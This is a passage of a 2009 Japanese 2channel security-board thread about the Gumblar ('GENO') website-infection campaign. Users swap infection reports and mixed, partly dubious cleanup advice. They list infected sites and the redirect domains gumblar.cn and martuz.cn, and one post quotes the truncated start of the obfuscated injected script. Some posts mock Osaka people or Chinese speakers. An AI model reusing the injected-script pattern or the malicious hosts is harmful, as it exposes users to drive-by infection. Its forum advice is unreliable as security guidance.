759名無しさん@お腹いっぱい。:2009/05/17(日) 00:14:16
いつも見ているサイトももしかしたら感染するかもしれないし
気をつけないといけんね
760名無しさん@お腹いっぱい。:2009/05/17(日) 00:14:28
>>751
この改行どっかで見たな
ν速か
761名無しさん@お腹いっぱい。:2009/05/17(日) 00:14:32
Nortonはなんで一向に対応しようとしないの?
762名無しさん@お腹いっぱい。:2009/05/17(日) 00:14:54
>>753
見てみた。感染してない
763名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:00
感染報告無いのに○○が感染してるって本当?という質問ずっと続ける奴はアレだな・・・
764名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:12
先生は忙しいんだよ
765名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:16
>>745
へー

なんでキャッシュ消せば大丈夫とか書いちゃったの?
766名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:23
レジストリエディタの編集をしようとすると落ちる症状
(立ち上がるがkeyの変更をしようとすると落ちてた)が連発してたが、
まさかこれの亜種だったのだろうか。

NET.FRAMEワークのパッチあてて直ったんだよな。
767名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:32
>>761
国内担当が土日でお休みだからじゃね
768名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:48
>>761
たぶんエンジンに手を入れない限りシグネチャで対応しきれないから。
769名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:54
GENO社員が火消しに降臨したか
770名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:58
・感染したらクリーンインスール
・予防はFlashとReaderを最新版に。


2行で済む話をなんで永遠8スレ消費してやってんの??


 
771名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:58
GENOは関係あるよ
そのままキャッシュ消して普通にネットしてる人だっていただろうしさ
772名無しさん@お腹いっぱい。:2009/05/17(日) 00:15:59
>>746
それじゃあアラートでないはずだ。
773名無しさん@お腹いっぱい。:2009/05/17(日) 00:16:08
>>761
センセイは職場放棄しましたOTL
774名無しさん@お腹いっぱい。:2009/05/17(日) 00:16:36
775名無しさん@お腹いっぱい。:2009/05/17(日) 00:16:58
先生ならさっきもう食べられないよーとか寝言言ってたぜ
早く起きていっぱい食えよコノヤロウ
776名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:00
GENOのせいだろどう見ても。ショップ閉鎖するべき。
パソコン直す店やったとしてもパソコンにコード仕込まれたら意味ないしなw
777名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:02
バスターも土日休みだっけ
778名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:03
>>761
先生は今敵に昏睡状態にされてるんだよきっと
779名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:07
>>770
・感染サイトが増え続ける一方だから
・亜種が出てきたから
・GENOが火消ししようとするから
780名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:14
>>729

ユーザーアクセスコントロールだ。
781名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:33
reader更新しときゃいいんだよ

次スレいらないね
782名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:34
>>770
その2行がいつ無効になるか解らないからみんな常駐してるんだろ
インフルエンザと同じだ
783名無しさん@お腹いっぱい。:2009/05/17(日) 00:17:51
>>761
先生なら今俺の隣で寝てるぜ
784名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:07
つか、Flash関係ないし・・
785名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:08
おいwww新型インフルと、GENOスレを同時に見てるとこの先地獄しか想像できないんだがwww
786名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:14
時限式とかないよね?ね?
787名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:25
VMwareでリボンマジックとwww■senlights■co■jp/seihin/kirenaru-1s■htmを踏んでみた
リボンマジックの方はなんともなかったが、後者のサイトはPDFリーダーの起動とウイルスサイトへのアクセスを確認した。
788名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:34
>>770
馬鹿だろお前
789名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:36
>>761
バスケがしたいですぅ・・・・
790名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:40
>>782
感染したら〜はハードウェア破壊されない限りどのウィルスでも有効だと思う
そもそも対処法じゃないけど
791名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:54
>>786
ありますん
792名無しさん@お腹いっぱい。:2009/05/17(日) 00:18:55
>>785
外に出ても感染
家の中でも感染
793名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:00
なんか「I LOVE YOU」メール依頼の大流行になりそうな悪寒
794名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:07
google preview入れてるとサムネで教えてくれるんだな
びびったわ
795名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:23
わしが育てた
796名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:31
>>761
先生を解放してあげようよ
797名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:37
>>782
経過観察って重要なんだな…
798名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:44
>>786
時限式と言うか、遠隔操作してるとこからいつでも弄れるからな。
いつ「始める」かは犯人次第なわけだ。

意味わかるよな?
799名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:45
GENO関係者が必死に火消しするのはなぜ?
800名無しさん@お腹いっぱい。:2009/05/17(日) 00:19:54
二次元に逃げるしかないな
801名無しさん@お腹いっぱい。:2009/05/17(日) 00:20:44
男に逃げるしかないな
802名無しさん@お腹いっぱい。:2009/05/17(日) 00:20:51
>>793
2ちゃんに書き込むとノートン先生が飛び起きる魔法のコードですね
803名無しさん@お腹いっぱい。:2009/05/17(日) 00:21:09
>>800
それだ!
804名無しさん@お腹いっぱい。:2009/05/17(日) 00:21:26
>>753
今見てきたけど、それらしい痕跡は無かったけどな。
805名無しさん@お腹いっぱい。:2009/05/17(日) 00:21:30
ドリクラの宣伝禁止
806名無しさん@お腹いっぱい。:2009/05/17(日) 00:21:38
>>788

馬鹿の理由を

みんなに伝わるようによろしく。

おまえよりはましだと思うけど。
807名無しさん@お腹いっぱい。:2009/05/17(日) 00:21:56
F-Secure Security Labs から
Thanks, we're publishing detection shortly.
って回答
808名無しさん@お腹いっぱい。:2009/05/17(日) 00:22:23
宣伝効果絶大だわ
ちっとまえまでGENOなんて知らなかったよ
809名無しさん@お腹いっぱい。:2009/05/17(日) 00:22:26
ワトソン博士を忘れちゃいないか?
810名無しさん@お腹いっぱい。:2009/05/17(日) 00:22:27
GENOの社員なんかじゃないよ、実際GENOの対応は酷いって書いただろ。
だけどGENOは責任なんかとっちゃくれないし、クリーンインストールしたりして損すんのは自分じゃんか。
ふだんから気をつけておくのにこしたことはないのにねって話したかっただけだよ。すまんね。
811名無しさん@お腹いっぱい。:2009/05/17(日) 00:23:03
>>810
「関係ない」って書いたからあれだったんだろうね。
812名無しさん@お腹いっぱい。:2009/05/17(日) 00:23:33
ノートン先生まだ刺身食ってる途中なんだぜ?
813名無しさん@お腹いっぱい。:2009/05/17(日) 00:23:34
セキュ板のGENOスレが立った時に、ここ数年でも最凶レベルにやばいって書いたけど本当にやばそうだな
814名無しさん@お腹いっぱい。:2009/05/17(日) 00:23:44
>>806
ageで無駄に行間空ける自己主張むき出しのレス馬鹿すぎる
815名無しさん@お腹いっぱい。:2009/05/17(日) 00:24:09
>>799
責任逃れだろう
816名無しさん@お腹いっぱい。:2009/05/17(日) 00:24:12
>>770
×永遠
○延々

・感染した場合、少なくとも感染時に通信したFTPのPassを変更する必要がある
・ウィルスがFTP以外の通信ログを取っているかどうか不明
817名無しさん@お腹いっぱい。:2009/05/17(日) 00:24:14
おいかまうなよ
818名無しさん@お腹いっぱい。:2009/05/17(日) 00:24:22
fc2.com復帰した。ただのメンテだったのか?
819名無しさん@お腹いっぱい。:2009/05/17(日) 00:24:40
>>810
あほの相手して損すんのは自分じゃんか。
820名無しさん@お腹いっぱい。:2009/05/17(日) 00:25:17
ウィルスばっかで嫌じゃぁああああああああああああああああああああ


でもちょっと・・・
821名無しさん@お腹いっぱい。:2009/05/17(日) 00:25:21
ブラスターのときもそうだったけど
ひとたび広がりだすと、亜種が出まくるので
現在OKであっても明日にどうなっているかわからん。

adobeを最新にしていれば大丈夫とあるが本当にそうと言い切れるか?
亜種があっさり突破できるレベルの改善なら一時凌ぎにしかならん。
それともadobeの今回の更新で根本的対処ができたという
確実な情報でも持っているのか?
822名無しさん@お腹いっぱい。:2009/05/17(日) 00:25:25
windows updateが出来ないのはなんでだ? WMP11 IE8とかインストールできない
823名無しさん@お腹いっぱい。:2009/05/17(日) 00:26:31
>>820
台風きたときのわくわく感とか感じたくてここに張り付いてる奴絶対いるなw
824名無しさん@お腹いっぱい。:2009/05/17(日) 00:26:33
>>538
その前にPG2の使い方レクチャーしてくれ
誘導されたとこにいったら怒られた
825名無しさん@お腹いっぱい。:2009/05/17(日) 00:26:42
どっかのアンチウイルスソフト業者がワクチンを無償配布しないものか…
826名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:01
とりあえず
Adobe Reader 9.1.1
Adobe Flash Player 10
が最新でOK?
827名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:08
>>822
割れ厨はダウソへどうぞ
828名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:24
>>823
地震板に加えてウイルス板が
829名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:34
>>823
ドキッ!
830名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:38
www■ribbonmagic■com/
確認。gumblar.cnへ飛ばすコードが2つ挿入されている。
>>324に追加
831名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:40
>>826
カンブリア紀もんじゃね?
832名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:44
>>821
なんか勘違いしてないか? 現状で最新版のFlash PlayerとかAdobe Readerで問題が出たって話はないだろ。
亜種が問題になってるのは>>1にあるような「わかりやすい症状」がどんどん変更されてるからじゃないのか?
833名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:44
>>822
感染しちゃってるからじゃね?
834名無しさん@お腹いっぱい。:2009/05/17(日) 00:27:46
とにかくGENOは何らかの償いをするべきだ
835名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:05
・sqlsodbc.chmは正常値(XP)
・数日前に突然explorer.exeが落ちた
・ウイルスバスターでスキャンしたら異常なし
・cmdとregeditは起動できる

これはどう判断すればいいんだ
836名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:13
>>823
わくわく通り越してぐったりだよ・・・
837名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:15
お前ら実はこの状況を楽しんでるだろ?
838名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:32
ノートン新しい定義ファイル来たけどどうだろ?
839名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:45
>>821
絶対大丈夫なんて誰も保証できない。

今回だけじゃなくネットで遊んでれば何時だって危険に晒されてるのが
現状じゃ有るまいか?
今回はadobeを最新にするのがベストって事でそんなに木馬やウイルスが
怖いなら携帯でするしかないぜ。
840名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:51
>>835
サイトとかもってないんか
841名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:53
>>835
エクスプローラが落ちるのはWindowsなら良くある話
842名無しさん@お腹いっぱい。:2009/05/17(日) 00:28:54
>>782

それ極論ね

少なくとも今回のはそれで防げるんだから

それ以上の対策はないし

未来のウィルス防げるなウィルスなんて存在してないって。
843名無しさん@お腹いっぱい。:2009/05/17(日) 00:29:10
>>837
…まあ
844名無しさん@お腹いっぱい。:2009/05/17(日) 00:29:39
845名無しさん@お腹いっぱい。:2009/05/17(日) 00:29:43
>>842

もういいって。

寝なよ。疲れたろ。
846名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:10
>>835
台湾バスターは対応してませんが?
847名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:22
>>823
俺なんて目まいがして吐き気が出てる
848名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:31
>>840
昔(何年も前)持ってたけど今はない、でもffftpは入ったまま
849名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:33
>>721
"…\chrome.exe" --disable-javascript --disable-java --disable-plagin --user-agent="Mozilla/5.0 (Windows; U; Windows NT 6.0)"
850名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:46
>>821
もっともだと思うが、Adobeの脆弱性以外の経路まで疑いに入れると、それはもはや
任意の新規ウイルスに対する心構えをどうにかするってレベルと同じ話になってしまうと思われ。

そうなった場合、もはやこのスレに張り付く以外にも新規の脆弱性関連の速報の収集とか、
未知のゼロデイアタックに対する一般的な対処法の検討とか、いろいろやらなければならない事が多すぎる。
851名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:48
>>847
きみは豚の方だ
852名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:51
なんだこの改行厨
そんなに自分のレス目立たせたいのか
自己顕示欲の塊みたいなやつだなw
それとも火消しに必死などっかの社員か?
853名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:52
>>477
改行豚は死んでこいや
854名無しさん@お腹いっぱい。:2009/05/17(日) 00:30:59
先生には優しいスレだな
今まで頼り切ってたからこれからもがんばってもらわないと困る
855名無しさん@お腹いっぱい。:2009/05/17(日) 00:31:07
GENOにとってはかえって宣伝になってんじゃねえか。
だって名前さえ知らなかった奴のほうが多いだろ?
いいか悪いかはともかく名前はずいぶん売れてるじゃんか。ほぼ2ch限定で。
856名無しさん@お腹いっぱい。:2009/05/17(日) 00:31:08
>>835
explorerはウイルスじゃなくても割と落ちる
857名無しさん@お腹いっぱい。:2009/05/17(日) 00:31:16
このウィルスを知らない人がどんどん感染していく始末
858名無しさん@お腹いっぱい。:2009/05/17(日) 00:31:28
もうgenoウィルスで定着しただろ
859名無しさん@お腹いっぱい。:2009/05/17(日) 00:32:14
バスターがGENOウイルスって命名してなかったか?
860名無しさん@お腹いっぱい。:2009/05/17(日) 00:32:21
じぇの?
861名無しさん@お腹いっぱい。:2009/05/17(日) 00:32:36
                 /゚     。
               ゚ヽ   {___/ ,.-‐ 。
                  )'´  豚 `ヽ. 大阪人アホやから
            。__,′・     ・  ─- 。とりつきやすかったわ
               { ┌‐──┐ j、
               .ゝ、 ̄ ̄ ̄_,ノ ヽ。
              ゚´    厂 ̄ }
ぱんでみっく            ゚   ゚    大阪人由来で
 したろかー /゚     。              /゚     。 大阪弁になってしもたわ
     ゚ヽ   {___/ ,.-‐ 。     ゚ヽ   {___/ ,.-‐ 。
        )'´  豚 `ヽ.            )'´  豚 `ヽ.    あほインフルエンザて呼んでや
   。__,′・     ・  ─- 。   。__,′・     ・  ─- 。
      { ┌‐──┐ j、         { ┌‐──┐ j、
      .ゝ、 ̄ ̄ ̄_,ノ ヽ。       .ゝ、 ̄ ̄ ̄_,ノ ヽ。
    ゚´    厂 ̄ }          ゚´    厂 ̄ }
          ゚   ゚                ゚   ゚
862名無しさん@お腹いっぱい。:2009/05/17(日) 00:32:43
>>848
まあexplorer落ちることよくあるんで大丈夫じゃないかね
感染サイト見たわけでもなさそうだしね
863名無しさん@お腹いっぱい。:2009/05/17(日) 00:32:55
864名無しさん@お腹いっぱい。:2009/05/17(日) 00:33:01
さて、下火になったことだし寝るかな
865名無しさん@お腹いっぱい。:2009/05/17(日) 00:33:05
バスターなんか役に立つと思ってる奴マジで言ってんのかお?大爆笑
866名無しさん@お腹いっぱい。:2009/05/17(日) 00:33:14
>>832
「これとこれさえ対策すれば全部OK!」なんて油断している奴を狙うのが今時のウイルスなんだがね。
ましてやここはセキュリティ板。未知の攻撃に警戒して何が悪い?
867名無しさん@お腹いっぱい。:2009/05/17(日) 00:33:53
大丈夫だろって言っている奴は
こんなスレなんて無視すりゃいいだけだな
868名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:08
GENON ENESIS
869名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:09
俺の火狐もよく落ちる
でも感染して無いし怪しいとこ踏んでない
870名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:14
感染報告ありの個人サイト持ちの対処として、(Winでxp、詳しい知識ない)

pcの感染はないか確認
flashとかアップロード
IEはjs無効にする
サイトのhtml記述を確認
FFFTPはソフトごと削除

これでもう一度感染チェックして暫くpcごと開かなかったら、(ネットワーク遮断で利用する)
自衛とゾンビサイト化は防げるでFAと思っていい?
勿論、毎日このスレはROMする
871名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:18
UACはユーザーアカウントコントロールな……
872名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:24
このウイルスってパソコンだけ?
ケータイも関係あるのかな
873名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:29
>>821

旧FlashやReaderの脆弱性を突いただけで

対策されたバージョンの穴を見つけることなんておいそれと出来ないよ

まぁプログラムとか自分で組めない人はこんなもんか。
874名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:47
バスター厨は、どこの板から来たの?
875名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:52
感染してるか気になる奴ってなんでウィルスチェックしないんだろう
876名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:54
リボンマジックは既にGoogle先生によって攻撃サイトとして登録済み
また、ribbonmagicはgumblar.cnに飛ばすコードであり、現在のところgumblar.cnは応答しない
ただしいつmartuz.cnに飛ばすコードに書き換えられるかわからないので注意
877名無しさん@お腹いっぱい。:2009/05/17(日) 00:34:58
>>862
今のところは感染してないってことでいいのかな。サンクス
878名無しさん@お腹いっぱい。:2009/05/17(日) 00:35:02
サイト管理者向けですが。

Troj/PHPMod-A: Behind the Troj/JSRedir-R attacks. (Sophos)
ttp://www.sophos.com/blogs/sophoslabs/v/post/4422
HTMLだけじゃなくPHPもやられるので、借り物のPHPスクリプト
(XOOPSとかMediaWikiとかPukiWikiとかphpBBとかvBulletinとかWordPressとか)を
中身も見ず・よくわからずに使ってる人は自分のサイトをちゃんと確認してね!
879名無しさん@お腹いっぱい。:2009/05/17(日) 00:35:05
Yahoo!のトップにニュース出してくれよー
880名無しさん@お腹いっぱい。:2009/05/17(日) 00:35:45
IEのjs無効ってどうやるの?
881名無しさん@お腹いっぱい。:2009/05/17(日) 00:35:56
>>879
それくらいしてくれればいいんだけどね。
今は豚インフルでてんやわんやだから・・・
882名無しさん@お腹いっぱい。:2009/05/17(日) 00:36:32
いや別にITニュースの枠は別にひとつくらい空けられるし
ITmediaなりImpressなりが配信すれば一発だろ
883名無しさん@お腹いっぱい。:2009/05/17(日) 00:36:39
>>880
ネットしなければ良いんだよ
884名無しさん@お腹いっぱい。:2009/05/17(日) 00:37:28
そろそろ大阪は日本から独立すべきだな
885名無しさん@お腹いっぱい。:2009/05/17(日) 00:37:46
一般人はPCのウィルスより豚のほうが大事なんだろうな
886名無しさん@お腹いっぱい。:2009/05/17(日) 00:37:55
www■senlights■co■jp/seihin/kirenaru-1s■htm
このサイト感染するみたいだし、誰かVmwareで動作試験しといてよ
PDFやフラッシュでのバージョンごとの感染の確認や、sqlsodbc.chm改変の有無
感染後にカスぺで本当に検出できるかどうか
887名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:03
>>880
セキュリティのカスタマイズ
ついでにActiveXも切っておけ

Java関係とActiveXを切って安心と思ったけど、
画像見ただけで感染するタイプのウイルスあったよね?
888名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:06
だからぁw
おまえら踊らされすぎ
Adobe関連を最新版にしとけば
普段の生活でいんだって。
煽り厨うざいわ
889名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:08
サイズもハッシュも違ったから感染してるんだろうけど
その他の症状が出ないんだよなあ
再起動怖くてできない
890名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:11
sage方も知らんやつが
なんか偉そうなこと言うてるで^^;
891名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:24
>>886
言い出しっぺの法則
892名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:27
>>885
職場以外でPC触らない人ならそんなもんだろ
893名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:34
・自転車の前カゴに財布
・磁気キャッシュカード
・パスワードは生年月日
・暗号化なしで無線LAN

平和な日本! PCにマルウェア仕込まれるくらい何でもないぜ!
894名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:42
>>886
用意できたらいくわ
895名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:49
>>870
別にFTP接続ソフトを削除する必要は無いよ。
起動して接続しなければいい。
896名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:50
              _,. -―――- 、
            /: : ‐: : : : : : :‐- 、: :\
            /: : /: : : : : : :\: : : : \: :\
         /: :/: :.|: : : : : ! : : : \: : : :.ヽ: : ヽ
         /: /: : 八: :!: : :|\: : : : ヽ: : : :',: : :.',
        ,': /ニ7⌒!:.!: : :| ⌒ : : : : : : : : |: : : :!
          /: :.|: :./  V\: !   ヽ: :!: :.|\|: : : :.\__,
       /: : :ハ: :|     ヾ   ∨!∨: : : : : : : : :ヽ
        /: : : : :.V:! x=ミ    x=ミ. !: : : : ハ: : : : : :.ハ
     /:/: : : : /: :! 、、  、       、、 !: : !: : :!: : : : : : :.}
     // |: : : /| :八    - 、    ,ィ: :/: : /: :ハ: : :|V
     {! 从: i'´ ̄::::>、 `ー '  イ!V /: : /: / |: :/
 _人_    /N::::_:::::/::| ` r ' //:/: /‐く  V     Kaspersky♪ Kaspersky♪
 `Y´    /::::::://:::/:::::|  ><  /:::丁´:::::::::::::V゚}∩  *
       /::::nんh_::∧:::::}/八. ∨::::::」::::::::::〈ヽ.ノ///〉
.     /:/| ! // 〉:::::>ヘ.ノ八 ソ::::{::::::::::::/:::}    っ
    //:::::::\__ノ〉::〈:::::::|/ ∧〉::::〉::::::::/::::∧  , ィ´
    /:::::::::::::::::::::/::::::::\::! /:::::>'´::::::::/::::/:::い.ノ):〉
    !:::::::::::::::::::/:::::::::::::::::ヾ厶イ:::::::::::::/:::/:::::::ヽノ:/
    |::::::::::::::/ヽ:::::::::::::::<>:::::::::::::::::::/ |:::::::::::::::::::/  *
    `ー七:::::::::::::::::::::::::::::::::::::::::::::::::/ |:::::::::::::::::/
     //:::::::::::::::::::::::<>::::::::::/::::/  ヽ:::::::::::/
   /⌒〈:::::::::::::::::::::::::::::::::::イ::::::::/    `ー‐'  *
897名無しさん@お腹いっぱい。:2009/05/17(日) 00:38:53
vistaでの感染は0ですか?
898名無しさん@お腹いっぱい。:2009/05/17(日) 00:39:27
>>888
そうやって安心したいのはわかる
とりあえずもう一度完全スキャンやり直せ
引っかかったらPC叩き壊せ
899名無しさん@お腹いっぱい。:2009/05/17(日) 00:40:26
質問してくるやつは、まずスキャンしろよ
900名無しさん@お腹いっぱい。:2009/05/17(日) 00:40:51
>>896
ゆいぃいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいい
901名無しさん@お腹いっぱい。:2009/05/17(日) 00:40:56
>>892
職場のPCでネットサーフィンしまくってる奴いるんだが大丈夫だろうか
902名無しさん@お腹いっぱい。:2009/05/17(日) 00:41:17
>>894
頼んだ。
sqlsodbc.chm改変の有無、感染後にカスぺで本当に検出できるかどうか
上記2つが事実でなかったらテンプレの対策意味なくなるしな
903名無しさん@お腹いっぱい。:2009/05/17(日) 00:41:33
>>896
そんなのに萌えてる余裕は無い
感染してたらもうダメなんだろうな…
904名無しさん@お腹いっぱい。:2009/05/17(日) 00:41:37
Youtubeとか動画サイトがやられると困るので、
中の人はセキュリティの見直しお願いします
905名無しさん@お腹いっぱい。:2009/05/17(日) 00:41:56
>>897
UAC機能無効にしてたらアウト

JaneStyleの作者がUAC無効にしろとか狂ったこと言い放ってたから
(銭ブラがVistaに対応してないという指摘への暫定対処らしいが未だに暫定のまま)
鵜呑みにして設定変えちゃってる奴も少なくないだろう
906名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:02
>>873
ただ怖いのは、FlashやAdobe Readerの脆弱性狙いの効果が薄れたら
動作を止めておとなしくしているかもしれないってこと。
で、新たな脆弱性が見つかったら活動再開。
907名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:03
>>893
今どきそんなATMスペックで街中闊歩してるのは情弱のバカくらいしかいないだろ






うわああああああバカだらけだ日本www
908名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:17
雨降ってきたな
909名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:22
>>901
この実話教えてやれよ
50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございます
けど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか?
995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
55 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:35:10.80 ID:AhXwTJEf
釣りだと思われるのはしゃくなので
IEの強制終了のせいで発注できず
ウイルスの原因が2CHでエロZIp
PCと自前のHDD回収される
生き恥をさらす
大量のロリ画像で性犯罪者扱い
どぷするの?と上司
自主退社←今ここ
このスレに気づかずに管理人に連絡とったのが悔やまれる
910名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:26
ええと、例の乙女ゲーのURLをチェッカーに放り込んだんだが、
<script language=javascript><!--
(function(){var goC='%';var xouq='<76<61<72<20a<3d<22<53<63<...
って感じで意味不明な値がずっと続いてる場合感染してる、でおk?
911名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:29
>>901
まず社会人としてアウトだろ
912名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:32
>>903
人生が終わるわけでもなかろうに
個人情報は抜き取られるけど
913名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:39
>>903
げんじつとうひという希望がある
914名無しさん@お腹いっぱい。:2009/05/17(日) 00:42:43
>>901
かなりヤバイかもね〜
・・・と会社のPCから書き込んでみる
915名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:05
>>901
たぶんPCの管理者が死ぬ
916名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:12
基本的にセキュ板は

トイレのドアノブにばい菌があるからハンカチ使って空けるような潔癖症のキチガイの集まりだから

一般の人は

FlashとReaderを最新版に

これだけでいいよ

無駄に不安煽るのが

ここのクズどもだから
917名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:29
sqlsodbc.chmってファイル何なの?
拡張子はヘルプ関係らしいが・・・
消しちゃダメかな?
918名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:39
>>909
よし明日にでも教えるわ
919名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:41
もう900超えたのか・・・
920名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:53
>>734
Adobe Flash Playerを使わない
も追加しないとマズイのでは?
921名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:53
>>916
なんでそんな必死なん
922名無しさん@お腹いっぱい。:2009/05/17(日) 00:43:56
>>905
どうやったら無効にできるかわからないし
そもそも今現在有効なのかすらわからない…
どこを見たらいいの?
923名無しさん@お腹いっぱい。:2009/05/17(日) 00:44:06
ノートン更新来た
GENO対応したか?
924名無しさん@お腹いっぱい。:2009/05/17(日) 00:44:45
>>922
ええーそんなレベルでネットやってるんですかぁー
925名無しさん@お腹いっぱい。:2009/05/17(日) 00:44:48
セキュ板民を煽ってるのにセキュ板で書き込みしてるやつって馬鹿なの?
926名無しさん@お腹いっぱい。:2009/05/17(日) 00:45:09
ウイルスバスターの更新はまだか?
927名無しさん@お腹いっぱい。:2009/05/17(日) 00:45:25
>>681
この状態で一週間後?想像したくもないわ
928名無しさん@お腹いっぱい。:2009/05/17(日) 00:45:56
>>916
とかなんとか言いながら、自分はしっかりと
マスクと食品備蓄して対策しているんだろ!
929名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:00
>>922
知らないんならいじってないってことだろ
930名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:04
しばらくネットは携帯からだな…
931名無しさん@お腹いっぱい。:2009/05/17(日) 00:46:06
>>926
>>●365日、毎日9:00〜24:00まで対応!
(#`ハ´)答えは全て「サイインストールスル アル」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート!
(#`ハ´)VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応!
(#`ハ´)VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート!
(#`ハ´)VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
(#`ハ´)切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート(遠隔操作)で対応も!!で解決!!
(#`ハ´)msconfigでスタートアップ・サービス全止め→再起動、なおらなければサイインストール アル
